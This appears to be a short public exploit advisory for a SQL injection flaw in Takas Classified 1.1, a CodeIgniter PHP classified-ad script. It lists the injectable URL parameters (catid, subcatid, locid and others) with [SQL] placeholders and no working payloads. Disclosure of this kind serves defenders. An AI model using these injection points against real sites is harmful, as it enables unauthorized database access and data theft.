Takas Classified Cogeigniter PHP Classified Ad Script 1.1 SQL Injection

Takas Classified Codeigniter PHP Classified Ad Script version 1.1 suffers from a remote SQL injection vulnerability.


MD5 | cad1bb405a50ac3f626bde9986910db1

# # # # # 
# Exploit Title: Takas Classified a Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://artifectx.com/
# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
# Demo: http://takas.artifectx.com/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
# Etc... Etc...
# # # # #


Related Posts

Comments